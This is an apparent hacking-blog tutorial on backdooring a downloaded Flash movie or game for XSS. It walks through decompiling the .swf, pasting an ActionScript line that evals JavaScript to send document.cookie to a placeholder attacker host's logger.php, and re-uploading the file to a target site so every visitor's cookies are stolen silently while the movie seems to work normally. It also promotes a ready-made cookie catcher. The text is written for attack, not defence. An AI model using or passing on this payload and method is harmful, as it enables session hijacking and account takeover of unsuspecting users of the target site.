Here is a tutorial on how to rip and edit an existing flash movie/game for use in XSS attacks. The objective is to steal cookies silently without changing the flash movie's behavior from the perspective of the user.
When a site allows you to upload .swf (flash) files or to embed a flash file as an object, it may be possible to create an XSS vulnerability so long as the parameter: allowScriptAccess=never is not specified in the embed code.
Some tools needed:
A SWF file decompiler (link) (note: I have the full version, the demo is limited)
A FLA editor (I use Adobe Flash CS6)
Navigate to a page where a flash movie or game loads, and either check the page source for the url to the flash file (ending .swf), or like shown below use firefox to go: tools>page info>media, and save file as to download it.
Once you have acquired the sothink decompiler open up the file you just downloaded and export it as a .fla file:
Open the .fla file in your editor, Adobe Flash CS6 in my case, and select the first frame of the movie, right click>Actions. This will bring up the Actionscript editor.
Find the beginning actionscript for the 'scene' and before any other code paste the following:
flash.external.ExternalInterface.call("eval", "var a = new XMLHttpRequest(); a.open('get', 'http://YourEvilSite.com/logger.php?cookie=' + document.cookie); a.send();");
From the File drop down, select export as movie:
The file is now ready to be uploaded/embedded to your target site. It should operate as normal but now behind the scenes whoever accesses it will have their cookies stolen. May I recommend a cookie catcher I prepared earlier!? (link).
Demo (cookie stealing code replaced with alert box): http://dfu123.comule.com/swfxss.swf
(If you find this useful, why not checkout a advert below to support the blog? :O ) ~r0ng